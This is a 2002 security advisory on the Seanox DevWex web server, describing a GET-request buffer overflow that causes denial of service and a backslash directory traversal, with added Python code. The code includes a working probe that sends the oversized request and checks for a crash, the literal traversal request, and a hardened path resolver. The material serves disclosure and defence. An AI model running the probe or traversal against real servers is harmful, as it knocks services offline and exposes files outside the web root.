

DevWex Denial of Service and Directory traversal
14th Jun 2002 [SBWID-5449]



	Seanox DevWex 1.2002.0520 Windows binary


	Ueli Kistler [] found the following:

	DevWex is a small, flexible web server that runs either as a  standalone
	Win32 binary or as a Java application.


	 Buffer-overflow problem



	There is a buffer overflow in the routine that handles a  GET  request.
	Sending a GET request line of at least 258383 characters  crashes  the
	server and leaves it inaccessible. Only the crash (denial  of  service)
	was demonstrated; whether the overflow can be turned into execution  of
	attacker-supplied shellcode was not determined.


	Example: GET 258383xA+CRLF+CRLF  (that is, the four bytes "GET ",  then
	258383 times the character "A", then two CRLF sequences; no HTTP version
	field and no headers are needed)
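	The following probe is an added example and not part of the original advisory or of DevWex. It builds the request exactly as described above (no HTTP version, no headers), confirms the target answers a benign GET / before the test, fires the oversized request, and re-checks whether the server still answers. Host and port are assumptions passed on the command line; the advisory does not state which port DevWex listens on. Run it only against your own test instance.

```python
import socket
import time
from typing import Optional

# Trigger length reported in the advisory for DevWex 1.2002.0520.
REPORTED_TRIGGER_LEN = 258383


def build_long_get(length: int) -> bytes:
    """Build the advisory's PoC request: "GET " + length x "A" + CRLF CRLF.

    The request deliberately carries no HTTP version and no headers (an
    HTTP/0.9-style simple request), exactly as the advisory describes it.
    """
    return b"GET " + b"A" * length + b"\r\n\r\n"


def send_raw(host: str, port: int, payload: bytes, timeout: float = 5.0) -> Optional[bytes]:
    """Send a raw request and collect the reply until the server closes.

    Returns the reply bytes (b"" if the server closed without answering) or
    None if the connection was refused, reset or timed out.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)
    except OSError:  # socket.timeout, ConnectionRefusedError, ConnectionResetError are all OSError
        return None


def is_alive(host: str, port: int, timeout: float = 5.0) -> bool:
    """Benign health check: a plain GET / that any working HTTP server answers."""
    reply = send_raw(host, port, b"GET / HTTP/1.0\r\n\r\n", timeout)
    return bool(reply)


def probe(host: str, port: int, length: int = REPORTED_TRIGGER_LEN) -> str:
    """Reproduce the DoS: confirm the server is up, send the long GET, re-check."""
    if not is_alive(host, port):
        return "not reachable before test"
    send_raw(host, port, build_long_get(length))
    time.sleep(1.0)  # give the process a moment to crash or stop accepting
    if is_alive(host, port):
        return "still responding"
    return "stopped responding (DoS reproduced)"


if __name__ == "__main__":
    import sys

    # Assumed invocation: python probe.py <host> <port>
    target, target_port = sys.argv[1], int(sys.argv[2])
    print(probe(target, target_port))
```

	The before/after health check matters: a single connection that times out proves nothing on its own, since a slow server would look the same. Comparing the benign GET / before and after the oversized request is what distinguishes a crashed process from a busy one.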




	 Directory traversal



	An attacker can request a URL containing Windows path delimiters  (back-
	slashes) to break out of the document root of DevWex. The  server  only
	guards against traversal written with forward slashes, while the Windows
	filesystem honours backslashes as well, so files outside  the  document
	root, including sensitive data, can be downloaded.


	Example: GET /..\\..\\..\\..\\anyfile
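	To show why the backslash request above gets through, here is an added example (not DevWex code and not part of the original advisory) of a naive traversal check beside a hardened path resolver. The naive check looks only for "/../" and accepts the advisory's request unchanged; the hardened version percent-decodes once, treats both "/" and "\" as separators, normalises the joined path and then requires the result to lie under the document root. The document roots used in the tests ("/srv/www", "C:\devwex\docs") are assumed values.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote


def naive_check(request_path: str) -> bool:
    """The kind of check that lets the advisory's request through.

    It recognises only forward-slash traversal, so "/..\\..\\anyfile" is
    accepted (returns True) even though Windows will happily walk it.
    """
    return "/../" not in request_path and not request_path.startswith("../")


def resolve_under_root(doc_root: str, request_path: str) -> Optional[str]:
    """Map an HTTP request path onto doc_root, or return None if it escapes.

    Both "/" and "\\" are treated as separators because on Windows the
    filesystem honours backslashes even when the URL parser does not; that
    is exactly the gap the GET /..\\..\\..\\..\\anyfile request exploits.
    """
    # Drop any query string before decoding, then percent-decode once so
    # that %2E%2E%5C is seen as ..\ rather than slipping past a literal check.
    raw = request_path.split("?", 1)[0]
    path = unquote(raw)
    if "\x00" in path:
        return None  # an embedded NUL would truncate the name in a C-level open()
    path = path.replace("\\", "/")

    # Normalise the root the same way so "C:\\devwex\\docs" compares cleanly.
    root = posixpath.normpath(doc_root.replace("\\", "/")).rstrip("/") or "/"
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))

    # After normalisation the result must be the root itself or lie strictly below it.
    prefix = root if root.endswith("/") else root + "/"
    if candidate != root and not candidate.startswith(prefix):
        return None
    return candidate


if __name__ == "__main__":
    # The advisory's request, written as a Python literal (single backslashes on the wire).
    advisory_request = "/..\\..\\..\\..\\anyfile"
    print("naive check accepts it:", naive_check(advisory_request))
    print("hardened resolver maps it to:", resolve_under_root("C:\\devwex\\docs", advisory_request))
```

	The resolver works on strings only, which is enough to demonstrate the separator problem; a real server should additionally pass the result through os.path.realpath and repeat the prefix test, so that symbolic links or junctions inside the document root cannot point back outside it.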



	Seanox has released a new version (1.2002.0601) that addresses these issues.
